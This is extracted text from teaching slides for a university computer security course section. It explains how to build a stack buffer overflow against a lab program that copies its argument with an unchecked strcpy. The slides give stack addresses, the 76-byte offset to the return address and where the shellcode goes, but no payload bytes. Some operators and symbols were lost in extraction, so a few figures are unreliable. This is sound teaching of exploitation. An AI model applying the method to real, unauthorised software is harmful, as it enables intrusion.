CS 155 Section 1 PP1

1
CS 155 Section 1PP1

• Eu-Jin Goh

2
Setting up Environment

• Demo

3
target1.c

• int foo( char arg, char out )
• strcpy( out, arg )
• return 0
• int main( int argc, char argv )
• char buf64
• if ( argc ! 2 )
• foo( argv1, buf )
• return 0

4
Stack in target1 layout

• argv1 ltshellcode bufs addygt
• argv0 /tmp/target1
• argc
• ra to which main() will return
• fp for mains stack frame
• buf64
• ptr to buf out // args to foo()
• ptr to argv1 arg // args to foo()

5
sploit1

• Need
• Location of return address
• addr on stack for ra to overwrite
• need main()s ra (not foo()s)
• Address of the buffer (buf in target1)
• address we want to force the program to jump to
• Distance between buffer and ra
• Size of overflow buffer

6
Buf addr

• addr of the target1 buf depends exploit overflow
  buffer size
• since exploit string lives above target1 buf on
  stack
• Once exploit buffer buf fixed, addr of target1
  buf wont change.

7
Details

• Size of overflow buffer
• Buf addr 0x9ffffb80
• reg ebp 0x9ffffbc8
• Difference is 0x48 72
• Buffer size 72 4 4 1 81
• Addr of buf
• Buf 0x9ffffe60

8
Crafting the exploit string

• Want target to jump to start of buf,
• place shellcode (size 45 bytes) at the start of
  the string
• ra exists at offset 76
• need exploit string76 to contain the addr
  target1 buf (0x9ffffe60)

9
Hints

• Various ways of seizing program flow control
  without overwriting return address
• Learn what registers esp, ebp point to during
  stages of program execution
• Learn what happens to registers and memory during
  LEAVE and RET calls

10
IA-32 review

• esp Stack Pointer (SP) points to the top of
  the stack (lowest mem addy)
• Points to last used word in stack or next
  available word location on stack (implementation
  dependent)
• ebp Frame Pointer (FP) points to fixed
  location within an activation record (stack
  frame)
• If ebp for some stack frame is stored at addr X
  then eip for that frame is stored at addr X 4
• Used to reference local vars and parameters since
  the distance from those to the frame pointer will
  not change whereas the distance from those to the
  stack pointer will (as other functions are called
  and the stack pointer is decremd )
• eip instruction pointer (aka ra)
• The instruction pointer (EIP) register contains
  the offset in the current code segment for the
  next instruction to be executed.

11
More IA-32 review

• When CALL procedure p(),
• Push eip the return address (ra)
• Push ebp saves previous frame pointer
• Copy sp into fp ebp esp
• The new ARs frame pointer will be the previous
  value of the stack pointer
• Advance sp (esp) for allocations on stack (that
  is, decrement it)
• When LEAVE procedure p(),
• This process is reversed
• Load ebp into esp
• Restore ebp from the stack

12
Interaction between EIP, EBP, ESP

• During CALL, value of eip register pushed onto
  stack
• Before RET, programmer should make sure that
  stack pointer (esp) is pointing to the eip on the
  stack does this via
• Move contents of ebp into esp
• Increment esp by 4
• esp should now point to (contain addy of) eip
• RET will load the value stored in esp into the
  eip register then jump to that value

13
The stack

• 0x9ffffef8 0x9fffff9e argv1 f9e
  SHELLCODE
• 0x9ffffef4 0x9fffff91 argv0 f91
  "/tmp/target1"
• 0x9ffffef0 2 argc
• ltSNIPgt
• 0x9ffffeb8 0x9fffff00 lt--- argv1 f00
  points to NULL
• 0x9ffffeb4 0x9ffffef4 lt--- argv0 ef4
  points to f91
• 0x9ffffeb0 2 lt--- argc
• 0x9ffffeac __libc_start_main198 lt--- ra
  what we want to overwrite
• 0x9ffffea8 0x9ffffec8 lt--- fp frame
  pointer
• 0x9ffffea4 0x9ffffef4 lt--- argv0 ef4
  points to f91
• 0x9ffffea0 _rtld_global lt--- garbage
  alignment stuff?
• 0x9ffffe9c ------last word of buf------
• ltSNIPgt
• 0x9ffffe60 ------beginning of buf------
• 0x9ffffe5c
• 0x9ffffe58
• 0x9ffffe54 0x9ffffe60 argv1 lt-- points to
  beginning of buf
• 0x9ffffe50 0x9fffff9e argv0 lt-- points to
  shellcode
• 0x9ffffe4c 0x8048461 lt--- ra in foo()
  ltmain78gt